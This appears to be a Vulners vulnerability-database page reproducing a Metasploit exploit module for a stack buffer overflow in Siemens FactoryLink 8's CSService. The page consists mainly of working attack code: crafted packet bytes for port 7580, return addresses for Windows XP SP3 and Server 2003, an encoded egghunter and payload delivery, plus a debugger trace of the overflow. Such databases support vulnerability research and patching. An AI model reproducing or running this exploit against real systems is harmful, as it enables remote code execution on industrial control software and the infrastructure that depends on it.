Vulners
Lucene search
Siemens FactoryLink 8 CSService Logging Path Param Buffer Overflow
##
# $Id: factorylink_csservice.rb 13019 2011-06-25 00:54:18Z sinn3r $
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
require 'msf/core'
class Metasploit3 < Msf::Exploit::Remote
Rank = NormalRanking
include Msf::Exploit::Remote::Tcp
include Msf::Exploit::Egghunter
def initialize(info={})
super(update_info(info,
'Name' => "Siemens FactoryLink 8 CSService Logging Path Param Buffer Overflow",
'Description' => %q{
This module exploits a vulnerability found on Siemens FactoryLink 8. The
vulnerability occurs when CSService.exe processes a CSMSG_ListFiles_REQ message,
the user-supplied path first gets converted to ANSI format (CodePage 0), and then
gets handled by a logging routine where proper bounds checking is not done,
therefore causing a stack-based buffer overflow, and results arbitrary code execution.
},
'License' => MSF_LICENSE,
'Version' => "$Revision: 13019 $",
'Author' =>
[
'Luigi Auriemma <aluigi[at]autistici.org>', #Initial discovery, poc
'sinn3r', #Metasploit (thx hal)
],
'References' =>
[
['URL', 'http://aluigi.altervista.org/adv/factorylink_1-adv.txt'],
],
'Payload' =>
{
'BadChars' => "\x00\x80\x82\x83\x84\x85\x86\x87\x88\x89\x8a\x8b\x8c\x8e\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9e\x9f",
'StackAdjustment' => -3500,
'EncoderType' => Msf::Encoder::Type::AlphanumMixed,
'EncoderOptions' => {'BufferRegister'=>'ECX'},
},
'DefaultOptions' =>
{
'ExitFunction' => "process",
},
'Platform' => 'win',
'Targets' =>
[
[
'Windows XP SP3',
{
'Offset' => 965, #Offset to overwrite RETN
'Ret' => 0x7e4456f7, #JMP ESP in USER32.dll
'Max' => 1400, #Max buffer used
}
],
[
'Windows Server 2003 SP0',
{
'Offset' => 965,
'Ret' => 0x77d20738, #JMP ESP in USER32.dll
'Max' => 1400,
}
]
],
'Privileged' => false,
'DisclosureDate' => "Mar 25 2011"))
register_options(
[
Opt::RPORT(7580)
], self.class)
end
#User input will get converted back to ANSCI with WideCharToMultiByte before vsprintf
def to_unicode(text)
output = ''
(text.length).times do |i|
output << text[i,1] << "\x00"
end
return output
end
def exploit
#Modify payload
#XP = Align EAX 0x3a bytes. Win2k3SP0 = 0x0a bytes
p = "\x57" #PUSH EDI
p << "\x59" #POP ECX
p << ((target.name =~ /server 2003/i) ? "\xb0\x0a" : "\xb0\x3a")
p << "\x30\xc1" #XOR CL,AL
p << payload.encoded
#Meterpreter tends to fail because of it being mangled. We use an egghunter
#instead to ensure the payload's integrity.
egg_options =
{
:checksum => true,
:eggtag => "W00T",
}
egghunter, p = generate_egghunter(p, payload_badchars, egg_options)
#x86/alpha_mixed egghunter
alpha_encoder = framework.encoders.create("x86/alpha_mixed")
alpha_encoder.datastore.import_options_from_hash( {'BufferRegister'=>'ESP'} )
egghunter = alpha_encoder.encode(egghunter, nil, nil, platform)
sploit = ''
sploit << make_nops(4)
sploit << p
sploit << rand_text_alpha(965-sploit.length)
sploit << [target.ret].pack('V*')
sploit << egghunter
sploit << rand_text_alpha(target['Max']-sploit.length)
sploit = to_unicode(sploit)
pkt = "\x00\x00\x4c\x45\x4e\x00\x40\x0b\x00\x00\x00\x00\x00\x00\x99\x00\x00\x00\x04\x00"
pkt << "\x00\x00\x01\x07\x00\x00\x0b\x31\x99\x62\x72\x6b\x01\x00\x00\x00\x02\x04\x00\x00"
pkt << "\x00\x04\x00\x00\x00\x01\x07\x00\x00\x0b\x19\x99\x00\x00\x00\x06\x00\x00\x00\x03"
pkt << "\x06\x00\x00\x0a\xf6\x11\x22\x33\x44"
pkt << sploit
pkt << "\x00\x00\x06\x00\x00\x00\x06\x11\x22\x33\x44\x00\x00\x04\x00\x00\x00\x04\x00\x00"
pkt << "\x00\x01\x99\x99\x99"
print_status("Sending malicious request to remote host...")
connect
sock.put(pkt)
handler
select(nil, nil, nil, 6)
disconnect
end
end
=begin
0:000> g
call vsprintf. Destination=0x0012ead0 Format=0x0043b92c Args=0x0012eedc
eax=0012eedc ebx=7c809a99 ecx=0043b92c edx=0012ead0 esi=0012eee8 edi=00000002
eip=0040b908 esp=0012eac4 ebp=0012fabc iopl=0 nv up ei pl nz na po nc
cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00000202
CSService+0xb908:
0040b908 ff15249b4400 call dword ptr [CSService+0x49b24 (00449b24)] ds:0023:00449b24={msvcrt!vsprintf (77c3fe49)}
0:000> dc 0012ead0
0012ead0 65535343 63697672 43203a65 47534d53 CSService: CSMSG
0012eae0 73694c5f 6c694674 525f7365 2d205145 _ListFiles_REQ -
0012eaf0 6f685320 72694477 2c303d73 6c694620 ShowDirs=0, Fil
0012eb00 3d726574 6150202c 613d6874 61616161 ter=, Path=aaaaa
0012eb10 61616161 61616161 61616161 61616161 aaaaaaaaaaaaaaaa
0012eb20 61616161 61616161 61616161 61616161 aaaaaaaaaaaaaaaa
0012eb30 61616161 61616161 61616161 61616161 aaaaaaaaaaaaaaaa
0012eb40 61616161 61616161 61616161 61616161 aaaaaaaaaaaaaaaa
=end
Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
01 Jul 2014 00:00Current
7.1High risk
Vulners AI Score7.1